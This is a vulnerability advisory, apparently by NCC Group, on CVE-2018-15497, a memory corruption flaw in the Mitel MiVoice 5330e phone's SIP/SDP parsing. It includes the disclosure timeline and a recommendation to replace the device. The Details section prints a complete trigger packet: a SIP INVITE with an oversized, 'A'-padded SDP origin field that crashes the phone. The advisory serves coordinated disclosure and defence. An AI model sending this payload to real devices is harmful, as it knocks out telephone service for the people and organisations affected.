Technical Advisory: Mitel MiVoice 5330e Memory Corruption Flaw

Vendor: Mitel Vendor URL: https://www.mitel.com Versions affected: 5330e IP Phone Systems Affected: Mitel MiVoice Author: Mattia Reggiani mattia.reggiani[at]nccgroup[dot]trust Advisory URL: https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-18-0009
CVE Identifier: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15497 Risk: Low-High (case dependent) – Denial of Service and possible Remote Code Execution

Summary

The Mitel MiVoice 5330e VoIP device is affected by a memory corruption flaw in the SIP/SDP packet handling functionality. An attacker can exploit this issue remotely, by sending a particular pattern of SIP/SDP packets, to cause a denial of service state in the affected devices and possibly remote code execution.

Location

SIP/SDP packet handling functionality.

Impact

Denial of service and potential remote code execution

Details

The following SIP/SDP packets was used to trigger the memory corruption condition:

<- SNIP -> INVITE sip:7301@172.16.140.40 SIP/2.0 Via: SIP/2.0/UDP 172.16.140.46:5060;rport;branch=branchyPStYido2t Max-Forwards: 70 From: "7302";tag=IKdO1hnVEu To:  Call-ID: calljkhWCVlITROWK9o0NVsJCEQ0VxWMGz@172.16.140.46 CSeq: 13100 INVITE Contact:  User-Agent: Test Agent Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO Accept: application/sdp Content-Type: application/sdp Content-Length: 1086  v=0 o=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0 0 IN IP4 127.0.0.1 s=-  c=IN IP4 127.0.0.1 t=0 0 m=audio 16782 RTP/AVP 0 a=rtpmap:0 PCM/8000 a=extmap:1 urn:ietf:params:rtp-hdrext:csrc-audio-level a=extmap:2 urn:ietf:params:rtp-hdrext:ssrc-audio-level a=rtcp-xr:voip-metrics m=video 16541 RTP/AVP 96 99 a=recvonly a=rtpmap:96 H264/90000 a={inj[28]}:96 profile-level-id=4DE01f;packetization-mode=1 a=imageattr:96 send * recv [x=[0-1366],y=[0-768]] a=rtpmap:99 H264/90000 a=fmtp:99 profile-level-id=4DE01f a=imageattr:99 send * recv [x=[0-1366],y=[0-768]]  SIP/2.0 400 Bad Request Via: SIP/2.0/UDP 172.16.140.46:5060;rport;branch=branchyPStYido2t From:"7302" ;tag=IKdO1hnVEu To:;tag=5b33b7f1-3ac-2f1e08b1 CSeq:13100 INVITE User-Agent:Mitel-5330e-SIP-Phone 06.05.00.11 08000FBFA477 Call-ID:calljkhWCVlITROWK9o0NVsJCEQ0VxWMGz@172.16.140.46 Content-Length:0 <- SNIP -> 

As shown in the following screenshot, a denial of service condition was triggered:

Figure 1 – Triggering memory corruption condition

Recommendation

According to the vendor, the Mitel 5330 phone has been superseded by Mitel 68xx series phones, therefore it is recommend to replace the affected device with the new version.

After a further investigation, the vendor released the public advisory with mitigation and recommended actions (https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-18-0009).

Vendor Communication

2018-07-16 Advisory reported to Mitel 2018-07-16 Mitel acknowledgement 2018-07-17 Details provided 2018-07-30 Mitel did not plan any mitigation since the affected version has been superseded by a new series of phones 2018-08-10 Mitel agreed for publishing the advisory
2018-09-25 Mitel released Product Security Advisory 18-0009

About NCC Group

NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionising the way in which organisations think about cyber security.

Written by:  Mattia Reggiani